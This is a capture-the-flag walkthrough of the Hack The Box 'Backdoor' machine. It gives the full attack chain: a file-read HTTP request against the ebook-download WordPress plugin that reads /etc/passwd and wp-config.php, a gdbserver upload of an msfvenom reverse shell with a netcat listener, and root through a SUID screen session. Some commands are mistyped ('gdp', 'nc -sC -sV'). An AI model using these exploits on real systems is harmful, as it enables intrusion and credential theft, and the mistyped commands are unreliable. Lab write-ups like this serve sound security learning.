Hello everyone,
Today i’ll show you how i pwned backdoor Machine…
Recon Steps
First of all after getting the IP i start a port scanning to know which ports are open… nc -sC -sV IP
okey we have only 2 ports 22,80…
if we see in nmap above, port 80 have Apache 2.4.41, wordpress
so I checked 80, it was a website with nothing on it…
i started to dir brute-forcing dirsearch -u backdoor.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
found those important dirs, starting with /wp-login and started brute-forcing admin password for about 1 hour and got 0 passwords. Rabbit hole
So, i decided to move on with another dir /wp-includes it has many common dirs & files for the wordpress framework. checked many of them but no thing is important.
Now let’s move to the main one… /wp-content i know that this dir has many dirs under it, all content for the site plugins, downloads, uploads, etc….
so started to dir brute-force on it to know which dirs are available for me
dirsearch -u backdoor.htb/wp-content/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
After finding those directories and searching on them, this was important one i found
Started using it to read files like /etc/passwd, ../../../wp-config.php
GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=/etc/passwd HTTP/1.1
Host: backdoor.htb
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Now by searching for a way to get RCE from LFI download parameter, i found nothing, but found that i can know all processes running in system maybe one of them vulnerable.
I can get a list of processes and their PID number by /proc/sched_debug
I can go deeper and know which processes running in cmd by /proc/PID/cmdline , any process contain this file mean it’s running in Terminal.
As we know process run in Terminal must have owner and shell type.
so here we searching for a PID that have any of three things:
cmdline file & bash|sh shell & owner user as we got from /etc/passwd
if we back to step (1) and searched for bash will find 3 matches
so, Let’s focus on those 3 first.
I changed LFI to /proc/4874/cmdline
now i got that there is a service gdbserver and running on 0.0.0.0:1337 which mean this port was opened but didn’t appear to us on port scanning.
By searching for exploit searchsploit gdbserver i found one Ref
but i used another way that i’m used gdb pre-installed tool in parrot-OS
Will create our revshell file using msfvenom first
$ gdp
(gdp) target extended-remote 10.10.11.125:1337
(gdp) remote put rev.elf shell.elf
(gdp) set remote exec-file shell.elf
--> after this step we must create a listener in another terminal
# nc -nlvp 4444
--> now we can run our elf file on target machine from gdp
(gdp) run
Privilege Escalation
after we have a shell , and we don’t have user password can’t run sudo -l
so we can check for SUID find / -perm /4000 2>/dev/null
I found only one SUID that we can run as root, after running it i will become a root
/usr/bin/screen -x root/root
Congrats !!!!! you are Root…
Tips:
don’t focus on getting RCE from the Vuln you found, maybe there is another way you can use to get into target machine.
Use your mind-set before using your hacking Skills.
